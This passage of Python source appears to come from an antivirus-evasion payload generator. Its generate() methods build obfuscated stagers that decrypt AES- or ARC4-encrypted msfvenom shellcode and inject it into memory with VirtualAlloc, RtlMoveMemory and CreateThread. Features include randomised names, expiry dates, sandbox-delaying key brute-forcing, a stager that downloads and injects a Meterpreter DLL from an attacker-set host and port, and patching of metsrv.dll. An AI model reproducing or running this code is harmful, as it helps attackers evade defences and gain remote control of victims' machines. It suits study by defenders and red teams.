expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n'
PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += '\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += '\t\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t\t\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
# randomize everything, yo'
sumMethodName = helpers.randomString()
checkinMethodName = helpers.randomString()
randLettersName = helpers.randomString()
randLetterSubName = helpers.randomString()
randBaseName = helpers.randomString()
downloadMethodName = helpers.randomString()
hostName = helpers.randomString()
portName = helpers.randomString()
requestName = helpers.randomString()
responseName = helpers.randomString()
injectMethodName = helpers.randomString()
dataName = helpers.randomString()
byteArrayName = helpers.randomString()
ptrName = helpers.randomString()
bufName = helpers.randomString()
handleName = helpers.randomString()
data2Name = helpers.randomString()
# helper method that returns the sum of all ord values in a string % 0x100
payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName)
payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName)
payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName)
payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName)
payloadCode += "\telse: return \"\"\n"
# method to inject a reflective .dll into memory
payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
payloadCode += "\tif %s != \"\":\n" %(dataName)
payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
# download the metpreter .dll and inject it
payloadCode += "%s = ''\n" %(data2Name)
payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandARCKey = helpers.randomString()
RandARCPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
else:
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, "rb")
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x57"
headerPatch += "\x87\x05\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"http://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ helpers.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += "import ctypes,base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
payloadCode += (
randPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ randVarName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
payloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ randPtr
+ "),"
+ randBuf
+ ",ctypes.c_int(len("
+ randVarName
+ ")))\n"
)
payloadCode += (
randHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ randPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
